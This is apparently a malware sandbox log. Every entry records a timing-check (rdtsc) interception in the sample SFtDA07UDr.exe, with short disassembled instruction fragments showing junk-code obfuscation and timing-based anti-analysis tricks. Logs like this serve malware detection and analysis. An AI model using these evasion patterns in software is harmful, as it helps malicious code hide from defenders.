Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D29FDC second address: D29FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F768C6F6316h 0x0000000e popad 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2A28A second address: D2A28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CD6A03 second address: CD6A0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CD6A0B second address: CD6A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F768C6F8106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D2A720 second address: D2A726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF95DA second address: CF95E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF95E0 second address: CF95E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF97E4 second address: CF97F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9A3B second address: CF9A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F6326h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9A56 second address: CF9A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F768C6F8106h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9A78 second address: CF9A7E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9A7E second address: CF9A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9A83 second address: CF9A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9A89 second address: CF9B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F768C6F8108h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push ecx 0x00000023 pushad 0x00000024 jns 00007F768C6F8106h 0x0000002a jbe 00007F768C6F8106h 0x00000030 popad 0x00000031 pop edi 0x00000032 cmc 0x00000033 push 00000004h 0x00000035 pushad 0x00000036 pushad 0x00000037 mov edx, dword ptr [ebp+122D3A29h] 0x0000003d jo 00007F768C6F8106h 0x00000043 popad 0x00000044 mov dword ptr [ebp+122D2D9Bh], esi 0x0000004a popad 0x0000004b sub dword ptr [ebp+122D1CA0h], esi 0x00000051 nop 0x00000052 jmp 00007F768C6F8117h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F768C6F8111h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9E31 second address: CF9E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9E37 second address: CF9E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CF9E3B second address: CF9E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFA175 second address: CFA18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F768C6F810Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFA18C second address: CFA191 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFA253 second address: CFA257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CFA257 second address: CD6A03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F768C6F6322h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F768C6F6318h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 call dword ptr [ebp+12450CC9h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F768C6F631Eh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3170A second address: D3170E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3170E second address: D3173D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F768C6F6316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007F768C6F6329h 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F768C6F6316h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D31C79 second address: D31C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D31C7D second address: D31C95 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F768C6F6316h 0x00000008 jng 00007F768C6F6316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F768C6F6316h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D31DEF second address: D31DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3B115 second address: D3B11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CACC1E second address: CACC37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8115h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: CACC37 second address: CACC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39ED7 second address: D39EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F768C6F8110h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39EEE second address: D39EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39EF9 second address: D39EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39EFF second address: D39F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39F03 second address: D39F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F8113h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F768C6F8118h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39F37 second address: D39F47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3A5D4 second address: D3A5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39B95 second address: D39BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F6320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D39BAE second address: D39BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F768C6F8106h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F768C6F810Bh 0x00000013 pop edx 0x00000014 jc 00007F768C6F8108h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F768C6F810Dh 0x00000025 jnc 00007F768C6F8106h 0x0000002b jc 00007F768C6F8106h 0x00000031 jnl 00007F768C6F8106h 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3AE80 second address: D3AE84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3AE84 second address: D3AE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3EE66 second address: D3EE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3EE6A second address: D3EE7C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F768C6F8106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F768C6F810Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D3F277 second address: D3F27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D41A54 second address: D41A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F768C6F8106h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D468E8 second address: D468F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D468F8 second address: D46901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D46901 second address: D46915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F631Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D46A58 second address: D46A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F8114h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D46A71 second address: D46A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D46CF7 second address: D46CFF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D47C8E second address: D47C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D47C92 second address: D47CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F768C6F8119h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D47CB5 second address: D47CBF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F768C6F6316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4ADAF second address: D4ADB9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F768C6F8106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4AABF second address: D4AAC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4F75D second address: D4F76E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F768C6F8106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4EB0A second address: D4EB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4EB15 second address: D4EB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4EB19 second address: D4EB1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4EB1F second address: D4EB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D4EF27 second address: D4EF31 instructions: 0x00000000 rdtsc 0x00000002 je 00007F768C6F6316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D57655 second address: D57659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5584C second address: D55856 instructions: 0x00000000 rdtsc 0x00000002 js 00007F768C6F631Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D55856 second address: D55862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F768C6F8106h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D564EF second address: D56502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F631Ah 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5A3B4 second address: D5A3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5A3BE second address: D5A3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5A3C5 second address: D5A3CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5A522 second address: D5A52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007F768C6F631Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5A94D second address: D5A973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F810Ah 0x00000007 jg 00007F768C6F8106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jne 00007F768C6F8106h 0x00000018 pushad 0x00000019 popad 0x0000001a jns 00007F768C6F8106h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5A973 second address: D5A978 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5AAD7 second address: D5AB15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8117h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F768C6F810Ah 0x00000010 jc 00007F768C6F8113h 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007F768C6F810Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5AB15 second address: D5AB19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5AC97 second address: D5AC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D5ADB4 second address: D5ADC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007F768C6F6316h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66549 second address: D6654D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D6654D second address: D66588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F768C6F631Dh 0x0000000e pop ebx 0x0000000f push eax 0x00000010 jns 00007F768C6F6316h 0x00000016 jmp 00007F768C6F6329h 0x0000001b pop eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66588 second address: D66597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66597 second address: D6659B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66730 second address: D66763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F768C6F8116h 0x00000007 jmp 00007F768C6F8119h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66763 second address: D66774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F768C6F632Ah 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D668BE second address: D668C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D668C2 second address: D668D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F768C6F631Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66CFB second address: D66D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66D01 second address: D66D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F768C6F6320h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D66D16 second address: D66D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D67744 second address: D6776E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jmp 00007F768C6F6325h 0x0000000c jl 00007F768C6F6316h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D6776E second address: D6777F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jnp 00007F768C6F810Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D65CDF second address: D65CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D65CE5 second address: D65CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D6F88B second address: D6F897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F768C6F6316h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D6F9CF second address: D6F9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D6F9D3 second address: D6F9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	RDTSC instruction interceptor: First address: D6F9D7 second address: D6F9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
